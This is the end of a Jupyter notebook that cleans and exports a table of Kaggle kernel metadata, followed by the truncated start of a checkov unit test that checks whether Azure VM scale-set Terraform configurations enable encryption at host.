" <td>0.0</td>\n",
" <td>starter-banknote-f2165545-1</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201954</th>\n",
" <td>1875417</td>\n",
" <td>1776773</td>\n",
" <td>6499806.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6498408.0</td>\n",
" <td>0.0</td>\n",
" <td>lightgbm-automated-feature-engineering-easy</td>\n",
" <td>NaN</td>\n",
" <td>57</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201955</th>\n",
" <td>1915910</td>\n",
" <td>498422</td>\n",
" <td>6657552.0</td>\n",
" <td>6528403.0</td>\n",
" <td>0.0</td>\n",
" <td>6655666.0</td>\n",
" <td>0.0</td>\n",
" <td>a3-demo-decision-trees</td>\n",
" <td>NaN</td>\n",
" <td>29</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201956</th>\n",
" <td>1915916</td>\n",
" <td>2080166</td>\n",
" <td>6655493.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6655493.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-worlds2018-0cb7d034-3</td>\n",
" <td>NaN</td>\n",
" <td>3</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201957</th>\n",
" <td>1915988</td>\n",
" <td>1660833</td>\n",
" <td>6656526.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6655878.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-worlds2018</td>\n",
" <td>NaN</td>\n",
" <td>39</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201958</th>\n",
" <td>1916035</td>\n",
" <td>1179427</td>\n",
" <td>6661990.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6661990.0</td>\n",
" <td>0.0</td>\n",
" <td>tutorial-linear-regression</td>\n",
" <td>NaN</td>\n",
" <td>22</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201959</th>\n",
" <td>1916052</td>\n",
" <td>1828058</td>\n",
" <td>6730922.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6656151.0</td>\n",
" <td>0.0</td>\n",
" <td>mks-proteins</td>\n",
" <td>NaN</td>\n",
" <td>208</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201960</th>\n",
" <td>1916057</td>\n",
" <td>1601569</td>\n",
" <td>6730437.0</td>\n",
" <td>6633328.0</td>\n",
" <td>0.0</td>\n",
" <td>6668207.0</td>\n",
" <td>0.0</td>\n",
" <td>exploration-of-f1-dataset-1102f3-aaf5b9</td>\n",
" <td>NaN</td>\n",
" <td>41</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201961</th>\n",
" <td>1916068</td>\n",
" <td>1267737</td>\n",
" <td>6656222.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6656222.0</td>\n",
" <td>0.0</td>\n",
" <td>fraud-detection</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201962</th>\n",
" <td>1916091</td>\n",
" <td>756325</td>\n",
" <td>6656455.0</td>\n",
" <td>NaN</td>\n",
" <td>69117.0</td>\n",
" <td>6656455.0</td>\n",
" <td>0.0</td>\n",
" <td>google-customer-revenue-prediction</td>\n",
" <td>NaN</td>\n",
" <td>239</td>\n",
" <td>3</td>\n",
" <td>3</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201963</th>\n",
" <td>1916101</td>\n",
" <td>1090244</td>\n",
" <td>6690675.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6656399.0</td>\n",
" <td>0.0</td>\n",
" <td>diabeticretinopathyvgg16-finetuning</td>\n",
" <td>NaN</td>\n",
" <td>144</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201964</th>\n",
" <td>1916124</td>\n",
" <td>1170777</td>\n",
" <td>6805081.0</td>\n",
" <td>6632919.0</td>\n",
" <td>0.0</td>\n",
" <td>6805081.0</td>\n",
" <td>0.0</td>\n",
" <td>protein-atlas-exploration-and-baseline</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201965</th>\n",
" <td>1916181</td>\n",
" <td>2386017</td>\n",
" <td>6660035.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6659703.0</td>\n",
" <td>0.0</td>\n",
" <td>01-iris-species</td>\n",
" <td>NaN</td>\n",
" <td>36</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201966</th>\n",
" <td>1916199</td>\n",
" <td>2108937</td>\n",
" <td>6938214.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6657733.0</td>\n",
" <td>0.0</td>\n",
" <td>chicago-crime-investigation</td>\n",
" <td>NaN</td>\n",
" <td>71</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201967</th>\n",
" <td>1916215</td>\n",
" <td>637434</td>\n",
" <td>6904698.0</td>\n",
" <td>6600035.0</td>\n",
" <td>69362.0</td>\n",
" <td>6657640.0</td>\n",
" <td>0.0</td>\n",
" <td>cnn-128x128x4-keras-from-scratch-lb-0-328</td>\n",
" <td>2.0</td>\n",
" <td>1808</td>\n",
" <td>15</td>\n",
" <td>36</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201968</th>\n",
" <td>1916243</td>\n",
" <td>885589</td>\n",
" <td>6895750.0</td>\n",
" <td>6601958.0</td>\n",
" <td>0.0</td>\n",
" <td>6656920.0</td>\n",
" <td>0.0</td>\n",
" <td>transforma-o-de-vari-veis</td>\n",
" <td>NaN</td>\n",
" <td>117</td>\n",
" <td>0</td>\n",
" <td>13</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201969</th>\n",
" <td>1916268</td>\n",
" <td>1113072</td>\n",
" <td>6941531.0</td>\n",
" <td>NaN</td>\n",
" <td>69337.0</td>\n",
" <td>6658725.0</td>\n",
" <td>0.0</td>\n",
" <td>apply-t-sne-on-news</td>\n",
" <td>3.0</td>\n",
" <td>907</td>\n",
" <td>7</td>\n",
" <td>15</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201970</th>\n",
" <td>1916283</td>\n",
" <td>885589</td>\n",
" <td>6684908.0</td>\n",
" <td>6601958.0</td>\n",
" <td>0.0</td>\n",
" <td>6657006.0</td>\n",
" <td>0.0</td>\n",
" <td>redu-o-de-dimensionalidade</td>\n",
" <td>NaN</td>\n",
" <td>43</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201971</th>\n",
" <td>1916285</td>\n",
" <td>885589</td>\n",
" <td>6681010.0</td>\n",
" <td>6601958.0</td>\n",
" <td>0.0</td>\n",
" <td>6657012.0</td>\n",
" <td>0.0</td>\n",
" <td>clusteriza-o</td>\n",
" <td>NaN</td>\n",
" <td>33</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201972</th>\n",
" <td>1916310</td>\n",
" <td>2080166</td>\n",
" <td>6657002.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6657002.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-data-4e7ab639-b</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201973</th>\n",
" <td>1916350</td>\n",
" <td>2092403</td>\n",
" <td>6671885.0</td>\n",
" <td>NaN</td>\n",
" <td>69316.0</td>\n",
" <td>6659016.0</td>\n",
" <td>0.0</td>\n",
" <td>how-to-score-0-0255-0-0245-top-10-score</td>\n",
" <td>NaN</td>\n",
" <td>552</td>\n",
" <td>2</td>\n",
" <td>10</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201974</th>\n",
" <td>1916366</td>\n",
" <td>2225268</td>\n",
" <td>6670628.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6657409.0</td>\n",
" <td>0.0</td>\n",
" <td>house-price-xgboost</td>\n",
" <td>NaN</td>\n",
" <td>11</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201975</th>\n",
" <td>1916461</td>\n",
" <td>2080166</td>\n",
" <td>6657685.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6657685.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-sentiment-analysis-f08e9d52-d</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201976</th>\n",
" <td>1916539</td>\n",
" <td>1162757</td>\n",
" <td>6659497.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6659320.0</td>\n",
" <td>0.0</td>\n",
" <td>mnist-with-fastai-style</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201977</th>\n",
" <td>1916566</td>\n",
" <td>1270421</td>\n",
" <td>6658657.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6658657.0</td>\n",
" <td>0.0</td>\n",
" <td>a-begining-try</td>\n",
" <td>NaN</td>\n",
" <td>31</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201978</th>\n",
" <td>1916572</td>\n",
" <td>2373215</td>\n",
" <td>6658820.0</td>\n",
" <td>1847749.0</td>\n",
" <td>0.0</td>\n",
" <td>6658820.0</td>\n",
" <td>0.0</td>\n",
" <td>getting-started-in-r-first-steps-337898</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201979</th>\n",
" <td>1916595</td>\n",
" <td>2355967</td>\n",
" <td>6658417.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6658388.0</td>\n",
" <td>0.0</td>\n",
" <td>my-first-data-science-homework</td>\n",
" <td>NaN</td>\n",
" <td>70</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201980</th>\n",
" <td>1916605</td>\n",
" <td>1977282</td>\n",
" <td>6818544.0</td>\n",
" <td>NaN</td>\n",
" <td>69150.0</td>\n",
" <td>6660859.0</td>\n",
" <td>0.0</td>\n",
" <td>u-s-democrat-and-republican-tweet-exploration</td>\n",
" <td>NaN</td>\n",
" <td>82</td>\n",
" <td>2</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" </tbody>\n",
"</table>\n",
"<p>201981 rows × 13 columns</p>\n",
"</div>"
],
"text/plain": [
" Id AuthorUserId CurrentKernelVersionId \\\n",
"0 1 2505 205.0 \n",
"1 2 3716 1748.0 \n",
"2 4 3716 41.0 \n",
"3 5 28963 19.0 \n",
"4 6 3716 21.0 \n",
"5 7 3716 48.0 \n",
"6 9 3716 50.0 \n",
"7 11 3716 373.0 \n",
"8 12 993 6467.0 \n",
"9 13 993 6468.0 \n",
"10 14 993 269065.0 \n",
"11 15 993 520.0 \n",
"12 16 993 154.0 \n",
"13 17 993 649.0 \n",
"14 20 993 803.0 \n",
"15 21 993 1227.0 \n",
"16 22 206545 190.0 \n",
"17 23 114978 193.0 \n",
"18 24 114978 308.0 \n",
"19 25 993 213.0 \n",
"20 26 993 212.0 \n",
"21 27 993 294.0 \n",
"22 29 114978 238.0 \n",
"23 30 9679 236.0 \n",
"24 31 185835 261.0 \n",
"25 32 19605 244.0 \n",
"26 33 319768 253.0 \n",
"27 34 28963 19064.0 \n",
"28 35 320040 264.0 \n",
"29 39 319893 552.0 \n",
"... ... ... ... \n",
"201951 1875333 442623 6498125.0 \n",
"201952 1875398 1497793 6497141.0 \n",
"201953 1875414 2080166 6494175.0 \n",
"201954 1875417 1776773 6499806.0 \n",
"201955 1915910 498422 6657552.0 \n",
"201956 1915916 2080166 6655493.0 \n",
"201957 1915988 1660833 6656526.0 \n",
"201958 1916035 1179427 6661990.0 \n",
"201959 1916052 1828058 6730922.0 \n",
"201960 1916057 1601569 6730437.0 \n",
"201961 1916068 1267737 6656222.0 \n",
"201962 1916091 756325 6656455.0 \n",
"201963 1916101 1090244 6690675.0 \n",
"201964 1916124 1170777 6805081.0 \n",
"201965 1916181 2386017 6660035.0 \n",
"201966 1916199 2108937 6938214.0 \n",
"201967 1916215 637434 6904698.0 \n",
"201968 1916243 885589 6895750.0 \n",
"201969 1916268 1113072 6941531.0 \n",
"201970 1916283 885589 6684908.0 \n",
"201971 1916285 885589 6681010.0 \n",
"201972 1916310 2080166 6657002.0 \n",
"201973 1916350 2092403 6671885.0 \n",
"201974 1916366 2225268 6670628.0 \n",
"201975 1916461 2080166 6657685.0 \n",
"201976 1916539 1162757 6659497.0 \n",
"201977 1916566 1270421 6658657.0 \n",
"201978 1916572 2373215 6658820.0 \n",
"201979 1916595 2355967 6658417.0 \n",
"201980 1916605 1977282 6818544.0 \n",
"\n",
" ForkParentKernelVersionId ForumTopicId FirstKernelVersionId \\\n",
"0 NaN 0.0 1.0 \n",
"1 NaN 26670.0 2.0 \n",
"2 NaN 0.0 9.0 \n",
"3 NaN 0.0 13.0 \n",
"4 NaN 0.0 15.0 \n",
"5 NaN 0.0 27.0 \n",
"6 NaN 0.0 49.0 \n",
"7 NaN 0.0 54.0 \n",
"8 NaN 0.0 55.0 \n",
"9 NaN 0.0 73.0 \n",
"10 NaN 14925.0 77.0 \n",
"11 NaN 20068.0 140.0 \n",
"12 NaN 0.0 141.0 \n",
"13 NaN 18337.0 155.0 \n",
"14 NaN 0.0 171.0 \n",
"15 NaN 17462.0 185.0 \n",
"16 NaN 0.0 188.0 \n",
"17 NaN 0.0 191.0 \n",
"18 NaN 0.0 194.0 \n",
"19 NaN 0.0 209.0 \n",
"20 NaN 0.0 212.0 \n",
"21 NaN 35477.0 214.0 \n",
"22 NaN 0.0 216.0 \n",
"23 NaN 0.0 236.0 \n",
"24 NaN 0.0 239.0 \n",
"25 NaN 0.0 244.0 \n",
"26 NaN 0.0 253.0 \n",
"27 NaN 0.0 262.0 \n",
"28 NaN 0.0 263.0 \n",
"29 NaN 0.0 321.0 \n",
"... ... ... ... \n",
"201951 NaN 0.0 6495275.0 \n",
"201952 2395222.0 0.0 6497049.0 \n",
"201953 NaN 0.0 6494175.0 \n",
"201954 NaN 0.0 6498408.0 \n",
"201955 6528403.0 0.0 6655666.0 \n",
"201956 NaN 0.0 6655493.0 \n",
"201957 NaN 0.0 6655878.0 \n",
"201958 NaN 0.0 6661990.0 \n",
"201959 NaN 0.0 6656151.0 \n",
"201960 6633328.0 0.0 6668207.0 \n",
"201961 NaN 0.0 6656222.0 \n",
"201962 NaN 69117.0 6656455.0 \n",
"201963 NaN 0.0 6656399.0 \n",
"201964 6632919.0 0.0 6805081.0 \n",
"201965 NaN 0.0 6659703.0 \n",
"201966 NaN 0.0 6657733.0 \n",
"201967 6600035.0 69362.0 6657640.0 \n",
"201968 6601958.0 0.0 6656920.0 \n",
"201969 NaN 69337.0 6658725.0 \n",
"201970 6601958.0 0.0 6657006.0 \n",
"201971 6601958.0 0.0 6657012.0 \n",
"201972 NaN 0.0 6657002.0 \n",
"201973 NaN 69316.0 6659016.0 \n",
"201974 NaN 0.0 6657409.0 \n",
"201975 NaN 0.0 6657685.0 \n",
"201976 NaN 0.0 6659320.0 \n",
"201977 NaN 0.0 6658657.0 \n",
"201978 1847749.0 0.0 6658820.0 \n",
"201979 NaN 0.0 6658388.0 \n",
"201980 NaN 69150.0 6660859.0 \n",
"\n",
" IsProjectLanguageTemplate \\\n",
"0 0.0 \n",
"1 0.0 \n",
"2 0.0 \n",
"3 0.0 \n",
"4 0.0 \n",
"5 0.0 \n",
"6 0.0 \n",
"7 0.0 \n",
"8 0.0 \n",
"9 0.0 \n",
"10 0.0 \n",
"11 0.0 \n",
"12 0.0 \n",
"13 0.0 \n",
"14 0.0 \n",
"15 0.0 \n",
"16 0.0 \n",
"17 0.0 \n",
"18 0.0 \n",
"19 0.0 \n",
"20 0.0 \n",
"21 0.0 \n",
"22 0.0 \n",
"23 0.0 \n",
"24 0.0 \n",
"25 0.0 \n",
"26 0.0 \n",
"27 0.0 \n",
"28 0.0 \n",
"29 0.0 \n",
"... ... \n",
"201951 0.0 \n",
"201952 0.0 \n",
"201953 0.0 \n",
"201954 0.0 \n",
"201955 0.0 \n",
"201956 0.0 \n",
"201957 0.0 \n",
"201958 0.0 \n",
"201959 0.0 \n",
"201960 0.0 \n",
"201961 0.0 \n",
"201962 0.0 \n",
"201963 0.0 \n",
"201964 0.0 \n",
"201965 0.0 \n",
"201966 0.0 \n",
"201967 0.0 \n",
"201968 0.0 \n",
"201969 0.0 \n",
"201970 0.0 \n",
"201971 0.0 \n",
"201972 0.0 \n",
"201973 0.0 \n",
"201974 0.0 \n",
"201975 0.0 \n",
"201976 0.0 \n",
"201977 0.0 \n",
"201978 0.0 \n",
"201979 0.0 \n",
"201980 0.0 \n",
"\n",
" CurrentUrlSlug Medal TotalViews \\\n",
"0 hello NaN 24 \n",
"1 rf-proximity 3.0 7547 \n",
"2 r-version NaN 9 \n",
"3 test1 NaN 9 \n",
"4 are-icons-missing NaN 7 \n",
"5 testing-version-bolding NaN 13 \n",
"6 testing-version-bolding-with-new-script NaN 2 \n",
"7 as-raster NaN 2 \n",
"8 whoops-doing-this-logged-in-under-my-own-name NaN 6 \n",
"9 installed-packages NaN 6 \n",
"10 installed-r-packages NaN 7921 \n",
"11 example-handwritten-digits 3.0 29080 \n",
"12 mean-digits NaN 9 \n",
"13 pixel-mean-and-variances-by-digit NaN 9989 \n",
"14 random-forest-benchmark-tree-4 NaN 7 \n",
"15 random-forest-benchmark-1 2.0 52294 \n",
"16 dougg-test NaN 164 \n",
"17 some-basic-stats NaN 230 \n",
"18 rotate-all-the-features NaN 2491 \n",
"19 running-system-commands NaN 0 \n",
"20 running-system-commands-1 NaN 84 \n",
"21 we-have-imagemagick-installed NaN 685 \n",
"22 randombananaclassifier NaN 766 \n",
"23 mytest NaN 124 \n",
"24 peek-data NaN 1064 \n",
"25 example-r NaN 337 \n",
"26 testo NaN 58 \n",
"27 python NaN 7 \n",
"28 digit-recognizer NaN 142 \n",
"29 digit-recognizer-using-knn NaN 717 \n",
"... ... ... ... \n",
"201951 project-euler-21 NaN 18 \n",
"201952 ny-stock-price-prediction-rnn-lstm-gru-eb2000 NaN 37 \n",
"201953 starter-banknote-f2165545-1 NaN 0 \n",
"201954 lightgbm-automated-feature-engineering-easy NaN 57 \n",
"201955 a3-demo-decision-trees NaN 29 \n",
"201956 starter-twitter-worlds2018-0cb7d034-3 NaN 3 \n",
"201957 starter-twitter-worlds2018 NaN 39 \n",
"201958 tutorial-linear-regression NaN 22 \n",
"201959 mks-proteins NaN 208 \n",
"201960 exploration-of-f1-dataset-1102f3-aaf5b9 NaN 41 \n",
"201961 fraud-detection NaN 17 \n",
"201962 google-customer-revenue-prediction NaN 239 \n",
"201963 diabeticretinopathyvgg16-finetuning NaN 144 \n",
"201964 protein-atlas-exploration-and-baseline NaN 17 \n",
"201965 01-iris-species NaN 36 \n",
"201966 chicago-crime-investigation NaN 71 \n",
"201967 cnn-128x128x4-keras-from-scratch-lb-0-328 2.0 1808 \n",
"201968 transforma-o-de-vari-veis NaN 117 \n",
"201969 apply-t-sne-on-news 3.0 907 \n",
"201970 redu-o-de-dimensionalidade NaN 43 \n",
"201971 clusteriza-o NaN 33 \n",
"201972 starter-twitter-data-4e7ab639-b NaN 2 \n",
"201973 how-to-score-0-0255-0-0245-top-10-score NaN 552 \n",
"201974 house-price-xgboost NaN 11 \n",
"201975 starter-twitter-sentiment-analysis-f08e9d52-d NaN 4 \n",
"201976 mnist-with-fastai-style NaN 6 \n",
"201977 a-begining-try NaN 31 \n",
"201978 getting-started-in-r-first-steps-337898 NaN 4 \n",
"201979 my-first-data-science-homework NaN 70 \n",
"201980 u-s-democrat-and-republican-tweet-exploration NaN 82 \n",
"\n",
" TotalComments TotalVotes LanguageName \n",
"0 0 0 1 \n",
"1 1 12 1 \n",
"2 0 0 1 \n",
"3 0 0 1 \n",
"4 0 0 1 \n",
"5 0 0 1 \n",
"6 0 0 1 \n",
"7 0 0 1 \n",
"8 0 0 1 \n",
"9 0 0 1 \n",
"10 2 6 1 \n",
"11 8 36 1 \n",
"12 0 0 1 \n",
"13 5 8 1 \n",
"14 0 0 1 \n",
"15 23 91 1 \n",
"16 0 0 1 \n",
"17 0 0 1 \n",
"18 0 4 1 \n",
"19 0 0 1 \n",
"20 0 0 1 \n",
"21 1 0 1 \n",
"22 0 1 1 \n",
"23 0 0 1 \n",
"24 0 0 1 \n",
"25 0 0 1 \n",
"26 0 0 1 \n",
"27 0 0 1 \n",
"28 0 0 1 \n",
"29 0 0 1 \n",
"... ... ... ... \n",
"201951 0 1 2 \n",
"201952 0 0 2 \n",
"201953 0 0 2 \n",
"201954 0 1 2 \n",
"201955 0 0 2 \n",
"201956 0 0 2 \n",
"201957 0 1 2 \n",
"201958 0 0 2 \n",
"201959 0 0 1 \n",
"201960 0 0 2 \n",
"201961 0 0 2 \n",
"201962 3 3 2 \n",
"201963 0 1 2 \n",
"201964 0 0 2 \n",
"201965 0 1 2 \n",
"201966 0 0 2 \n",
"201967 15 36 2 \n",
"201968 0 13 2 \n",
"201969 7 15 2 \n",
"201970 0 1 2 \n",
"201971 0 1 2 \n",
"201972 0 0 2 \n",
"201973 2 10 2 \n",
"201974 0 0 2 \n",
"201975 0 0 2 \n",
"201976 0 0 2 \n",
"201977 0 0 2 \n",
"201978 0 0 1 \n",
"201979 0 2 2 \n",
"201980 2 4 1 \n",
"\n",
"[201981 rows x 13 columns]"
]
},
"execution_count": 21,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"# Replace missing ForumTopicId values with 0\n",
"df['ForumTopicId'].fillna(0, inplace=True)\n",
"df"
]
},
{
"cell_type": "code",
"execution_count": 22,
"metadata": {
"scrolled": true
},
"outputs": [
{
"data": {
"text/html": [
"<div>\n",
"<style scoped>\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"</style>\n",
"<table border=\"1\" class=\"dataframe\">\n",
" <thead>\n",
" <tr style=\"text-align: right;\">\n",
" <th></th>\n",
" <th>Id</th>\n",
" <th>AuthorUserId</th>\n",
" <th>CurrentKernelVersionId</th>\n",
" <th>ForkParentKernelVersionId</th>\n",
" <th>ForumTopicId</th>\n",
" <th>FirstKernelVersionId</th>\n",
" <th>IsProjectLanguageTemplate</th>\n",
" <th>CurrentUrlSlug</th>\n",
" <th>Medal</th>\n",
" <th>TotalViews</th>\n",
" <th>TotalComments</th>\n",
" <th>TotalVotes</th>\n",
" <th>LanguageName</th>\n",
" </tr>\n",
" </thead>\n",
" <tbody>\n",
" <tr>\n",
" <th>0</th>\n",
" <td>1</td>\n",
" <td>2505</td>\n",
" <td>205.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>1.0</td>\n",
" <td>0.0</td>\n",
" <td>hello</td>\n",
" <td>NaN</td>\n",
" <td>24</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>1</th>\n",
" <td>2</td>\n",
" <td>3716</td>\n",
" <td>1748.0</td>\n",
" <td>NaN</td>\n",
" <td>26670.0</td>\n",
" <td>2.0</td>\n",
" <td>0.0</td>\n",
" <td>rf-proximity</td>\n",
" <td>3.0</td>\n",
" <td>7547</td>\n",
" <td>1</td>\n",
" <td>12</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>2</th>\n",
" <td>4</td>\n",
" <td>3716</td>\n",
" <td>41.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>9.0</td>\n",
" <td>0.0</td>\n",
" <td>r-version</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>3</th>\n",
" <td>5</td>\n",
" <td>28963</td>\n",
" <td>19.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>13.0</td>\n",
" <td>0.0</td>\n",
" <td>test1</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>4</th>\n",
" <td>6</td>\n",
" <td>3716</td>\n",
" <td>21.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>15.0</td>\n",
" <td>0.0</td>\n",
" <td>are-icons-missing</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" </tbody>\n",
"</table>\n",
"</div>"
],
"text/plain": [
" Id AuthorUserId CurrentKernelVersionId ForkParentKernelVersionId \\\n",
"0 1 2505 205.0 NaN \n",
"1 2 3716 1748.0 NaN \n",
"2 4 3716 41.0 NaN \n",
"3 5 28963 19.0 NaN \n",
"4 6 3716 21.0 NaN \n",
"\n",
" ForumTopicId FirstKernelVersionId IsProjectLanguageTemplate \\\n",
"0 0.0 1.0 0.0 \n",
"1 26670.0 2.0 0.0 \n",
"2 0.0 9.0 0.0 \n",
"3 0.0 13.0 0.0 \n",
"4 0.0 15.0 0.0 \n",
"\n",
" CurrentUrlSlug Medal TotalViews TotalComments TotalVotes \\\n",
"0 hello NaN 24 0 0 \n",
"1 rf-proximity 3.0 7547 1 12 \n",
"2 r-version NaN 9 0 0 \n",
"3 test1 NaN 9 0 0 \n",
"4 are-icons-missing NaN 7 0 0 \n",
"\n",
" LanguageName \n",
"0 1 \n",
"1 1 \n",
"2 1 \n",
"3 1 \n",
"4 1 "
]
},
"execution_count": 22,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"# Export the cleaned frame, then re-read it to confirm the CSV round-trips\n",
"df.to_csv('../Datasets/KernelsCleaned.csv',index=False)\n",
"kern = pd.read_csv('../Datasets/KernelsCleaned.csv')\n",
"kern.head()"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 2
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython2",
"version": "2.7.15rc1"
}
},
"nbformat": 4,
"nbformat_minor": 2
}

# tests/terraform/checks/resource/azure/test_VMEncryptionAtHostEnabled.py (from jamesholland-uk/checkov, Apache-2.0)
import unittest
import hcl2
from checkov.terraform.checks.resource.azure.VMEncryptionAtHostEnabled import check
from checkov.common.models.enums import CheckResult
class TestVMEncryptionAtHostEnabled(unittest.TestCase):
def test_failure1(self):
hcl_res = hcl2.loads("""
resource "azurerm_windows_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_windows_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure2(self):
hcl_res = hcl2.loads("""
resource "azurerm_windows_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
encryption_at_host_enabled = false
source_image_reference {
